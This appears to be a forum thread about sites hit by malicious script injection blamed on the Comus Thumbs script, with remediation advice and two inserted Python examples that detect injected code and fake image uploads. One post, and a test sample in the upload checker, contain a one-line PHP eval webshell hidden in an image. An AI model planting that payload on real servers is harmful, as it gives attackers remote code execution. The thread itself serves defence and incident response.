Got hacked! Help!
Some of my sites that use TGPX, TEVS and Comus Thumbs are getting malware injection attacks. One of my dedicated servers got hit by a malware distributor.
The code below is injected right after the body tag of HTML, tmpl and some PHP files. Quote:
But they are constantly adding this JS code even if I remove it... Since the box is unmanaged, maybe I will have to reload the server OS and restore all files from backup, but I'm worried that the backup is infected as well.. Oh crap. Beware guys, check your server security, file/dir permissions etc. Also your PC is not safe either. Install a good anti-malware and don't save passwords in your local FTP client. http://www.webhostingtalk.com/showth...rame+injection
Change your index page, delete the page having that code, then change all your access.
Is it this one?
forums.digitalpoint.com/showthread.php?t=901622
This is usually caused by a virus on your computer. Have your host check the FTP logs, and I bet you will find a bunch of unknown logins. These viruses append this code to any file named index.php, index.html, etc.
I am amazed how many web hosts have easy-to-hack FTP logins...
If it's not caused by your own computer, it may also be caused by something on your site...
If you have photo uploads... it's possible someone has uploaded a fake image that is actually running code... You may also have the permissions set wrong on the files on your server, allowing someone to exploit your box and add things to the content...
Good luck getting that code out of your sites too...
Do yourself a favor and find the security hole before you fix the site.
You need to find how they got in (assuming they hacked your server).
Here's my guide:
Step 1: update your Adobe Reader to the latest version (9.xx) or, even better, remove it and put in Foxit Reader (much smaller and faster).
Step 2: update the Flash Player plugins for IE and FF.
Step 3: download 2-3 anti-spyware programs and check your computer.
Step 4: once you are clean, log in and change all your passwords and fix the sites.
Step 5: monitor what's going on...
Extra steps:
* Download and use Total Commander 7.5, which has a password encryption option that makes your passwords safe (this I haven't found in any other software, and that's the weakest point of most FTP clients).
* Always have anti-virus, firewall and anti-spyware apps active (I use Nod32 Smart Security AV+FW + AdAware).
* Use only Firefox and Chrome instead of IE.
All mentioned software you may find and download at http://www.filehorse.com
Dude, it's a Comus Thumbs issue as far as I'm aware. I'm currently deleting all my Comus installs (over 40) and replacing the script with a new one, as I was hit with this hack 3 days ago and am still fixing it.
I have used Comus for over 5 years and these hacks are all too regular these days; they never update Comus and it's going to shit, so I would delete it and rebuild the site with a new script. My 2 cents.
Were you using FileZilla to upload? I know a while back there was a problem with that program letting a virus in to change your .php files.
Okay, a few things here:
What scripts are you running on your server? Are you running Joomla? What are the directory permissions of your PHP files? Hit me up on AIM or ICQ if your host isn't going to fix it for you, as I hate people that hack sites more than anything on the face of the damn planet.
Problem solved.
When the script is executed (I visited an infected site accidentally yesterday, I guess) it loaded malware disguised as a .pdf or .swf file that steals username/password data from the PC.
The malware is hosted at another infected site and loaded via iframe, then executed in the browser. Now the hacker got my sites' logins and infected my sites too. I don't know how he connected to my box though. I guess he's using a remote script that doesn't leave log info. Even if I remove those malwares from my PC and change the FTP password, the hacker can get my new password easily since I had to load my sites to check. So it is very important to never load the sites during troubleshooting. This is what I did, and it seems like the code is gone finally, but still monitoring..
1. Reboot the PC and scan it for spyware.
2. Reboot again and change all server passwords.
3. Remove the code from all server files (index.html, category.html, index.php, etc..) with a server-side text editor.
4. Never load infected web pages in a browser during #3.
5. Install mod_security and change file permissions.
This thing reminds me of BackOrifice in '98. It's the most annoying fuckware I have ever had. It passed McAfee. Remember to use a good antivirus on your PC. I had good results with Malwarebytes.org. Thanks for the advice.
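Step 3 above means finding every file that carries the injected block right after the body tag. As an added example (not code from the thread or from any of the scripts it names), here is a Python scanner that walks a web root, reports HTML/PHP/tmpl files with a script or iframe element directly after the body tag, and also flags world-writable files of the 777 kind the thread blames. The web root path and the constructed sample strings are assumptions.

```python
"""Scan a web root for code injected directly after <body> and for
world-writable files. Added example, not from the thread. Usage (path is
an assumption): python scan_injected.py /var/www
"""
import os
import re
import stat
import sys

# File types the thread reports as infected.
SUSPECT_EXT = {".html", ".htm", ".php", ".tmpl"}

# <body ...> followed (after optional whitespace) by a <script> or <iframe>.
# The injected code sits right after the body tag, so only that spot is checked;
# a hit is a candidate for manual review, not proof of infection on its own.
INJECT_RE = re.compile(
    r"<body\b[^>]*>\s*(<(?:script|iframe)\b.*?</(?:script|iframe)\s*>)",
    re.IGNORECASE | re.DOTALL,
)


def find_injection(text):
    """Return the element found right after <body>, or None if clean."""
    m = INJECT_RE.search(text)
    return m.group(1) if m else None


def is_world_writable(mode):
    """True if the 'other' write bit is set (e.g. mode 777 or 666)."""
    return bool(mode & stat.S_IWOTH)


def scan_tree(root):
    """Walk root and return a list of (path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_world_writable(os.stat(path).st_mode):
                findings.append((path, "world-writable"))
            if os.path.splitext(name)[1].lower() in SUSPECT_EXT:
                with open(path, "r", encoding="utf-8", errors="replace") as f:
                    hit = find_injection(f.read())
                if hit:
                    findings.append((path, "injected after <body>: " + hit[:60]))
    return findings


if __name__ == "__main__":
    for path, reason in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, reason)
```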
and another reason to not use ftp, but sftp....
Yep, looks like Comus is gonna be dead soon. Lots of security holes and no updates. Also going to drop it ASAP.
Most are 644; the data/templates dir and files were set to 777. I changed lots of files to 444 for monitoring. Will contact you if I get the code again. Thanks!
This exploit is going around, and it seems Comus is the problem, from watching the audit logs and investigating. Even if a server has Comus installed, unless it is set up with 1 domain per login etc., due to permissions (i.e. having 777 on things you should not) it will infect a whole mess of files and leave backdoors everywhere.
Welcome to the club; my one old unsecured machine is also hacked with completely the same crap. I am working on removing it now. And yes, I do have several Comus installations there. But I don't see how the Comus bug can affect all possible sites, no matter whether they are based on ST, TGPX or something else (and I have all three rotator scripts installed).
Yep, my Comus sites have been hacked too for the last couple of days... fucking me off thinking how many will not return because of warnings thrown up by their anti-virus... already had an email from Google saying they have tagged my highest traffic site with a "this site could harm your computer" in their search pages... just waiting for more emails from them for my other Comus sites! :(
Look at all the morons in here.
Here's a quote from my host when I told them not to bother scanning my sites as it looks like a Comus issue...
"Yes, Comus Thumbs has been causing a lot of issues lately :( "
Ok, so we concluded Comus is the cause of this? So I can start removing it.
It happened when I was on the plane to the Montreal show. That sucked, but it was resolved in like 20 mins. after I found it, and it was fixed by the programmers and system engineers.
"But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware."
Hahaha, not only does it serve up malware, it serves up malware faster and more efficiently. Hahaha, man, that really cracks me up in a very geeky way.
The infection did not even take place on any of my office PCs, but in the office a few blocks down the street where the designers and programmers have their office. One guy there had an infected PC that had FTP access to one of my servers. Not sure if they use Comus or not, but I don't think so. Infection takes place through infected adult websites in all popular browsers without anti-virus programs seeing it. Hidden custom-built (FTP) logs show somebody using my FTP user/pass without brute force, entering and adding some files and making some changes similar to all infected victims.
If someone has already hacked your box, you have way more issues to worry about... First things first: http://www.rootkit.nl/projects/rootkit_hunter.html Download it, install it, run it; then you can rule out most rootkits and learn if your box has been compromised or not... If it has, you know the problem... if it hasn't, then you can move on to the next step. GL!
Actually, old Comus is hackable... These are usually NOT FTP access problems, but problems with PHP scripts being hackable.
Here are copy-pastes of the JavaScript code:
http://pastebin.com/m53fc9126 http://pastebin.com/m1b861dd8
All my sites were hacked through Comus. If you use Comus, I advise deleting it and using another script; this appears to be the only fix for me. :2cents
Found this on Webhostingtalk.com
Quote:
Then again, it's not recommended to install unreliable PHP scripts anyway..
Well, the first thing I did was to disable FTP completely, but that didn't help anything. Anyway, my computer was not compromised since I am not using FTP at all, only SFTP.
My favorite exploit is the fake image upload that has a correct image header...
If the image gets stored "as is", the first line of it is <?eval($_REQUEST['someVar'])?>. If the host is configured to parse image files (tracking, dynamic images, etc...), anything they pass in to the request gets eval'd... so elegant, so simple, so devastating...
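The fake-image trick above passes any check that only looks at the file header. As an added example (not code from the thread or from any of the scripts it names), here is a Python upload check that verifies the image magic bytes and then refuses files that carry a PHP open tag anyway; the sample bytes are constructed for the demo. It is defence in depth: the real fix is to serve uploads from a directory the web server never executes as PHP.

```python
"""Reject an 'image' upload that has a valid image header but embeds PHP.
Added example, not from the thread. Sample inputs are constructed."""
import re

# Magic bytes of the image types an upload form would normally accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
}

# PHP open tags: <?php, the short tag <? followed by code, <?= and the
# legacy <script language="php"> form.
PHP_TAG_RE = re.compile(
    rb"<\?(?:php\b|=|\s|[A-Za-z])|<script\s+language\s*=\s*['\"]?php",
    re.IGNORECASE,
)


def image_type(data):
    """Return the image type by magic bytes, or None if no header matches."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def contains_php(data):
    """True if a PHP open tag appears anywhere in the bytes. Compressed image
    data can contain '<?' by chance, so a hit means reject or re-encode."""
    return PHP_TAG_RE.search(data) is not None


def check_upload(filename, data):
    """Return (accepted, reason). The header check alone is not enough."""
    kind = image_type(data)
    if kind is None:
        return False, "no recognised image header"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in {"png", "gif", "jpg", "jpeg"}:
        return False, "extension not an image type"
    if contains_php(data):
        return False, "valid %s header but PHP tag inside" % kind
    return True, kind


# Constructed samples: the first looks like a GIF to a header-only check.
FAKE_GIF = b"GIF89a" + b"<?eval($_REQUEST['someVar'])?>"
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16
```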
Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
I think you might need a managed host.
ATM this is where we stand. I'm not saying Comus is the prob, but it is most likely the cause of all probs. The Comus license key admin login page file is broken ATM, one of the things that happened to my girlfriend's WordPress site during the hacks. TBH with you guys, I myself am ditching Comus as my script and am going for an alternative. For now it's Smart Thumbs, and as I've got over 100 Comus sites I've got a long and hard task ahead to switch 'em all over. I'm really hoping that all is well with Tony, but since I haven't heard from or seen him online in the past three weeks it makes me wonder what the fuck is going on. I hope I'm not getting loaded with 1000s of messages on my ICQ... thnx y'all, Ed
I am not sure how you can be so sure that Comus is actually the root of your problems. I am using Comus too, but with tightened security on the server itself and with my OS security I never get hacked, nor get into trouble with any of my sites.
This time I haven't been affected by this Comus hack (which I think is not a Comus hack, just a malware insertion) and my sites are running smoothly. The only thing I don't like about Comus is that its admin interface loads an iframe from their website, so if their website has the malware, then technically every site that runs Comus has it too. To get rid of malware and to actually avoid getting it, just install a normal OS, like Linux, or buy a Mac. Oh, and just one remark: before doing anything on your own, have the host run ClamAV on your box/v. acc. and scan for potentially infected files, as well as run the rootkit detection tools. Then it's your turn to make your own box clean and more secure. Good luck!
Look at your .htaccess and check if everything is working nicely.
I've had this before!!
Webair reverted my sites back to before the infection and changed all FTP info.
Old thread. Yes, I was wrong. It's a Comus Thumbs hack. No FTP password issue.
I misunderstood it as another iframe injection attack that was caused by viruses on the local machine. I installed mod_security, then it stopped the code injection, but I thought it was fixed by removing viruses from my PC. Anyway, it's completely fixed by removing all backdoor scripts and infected files. If anyone still faces this problem, refer to this thread. http://www.gfy.com/fucking-around-and-business-discussion/928915-secure-delete-comus-installation-html-php-files-server-infected.html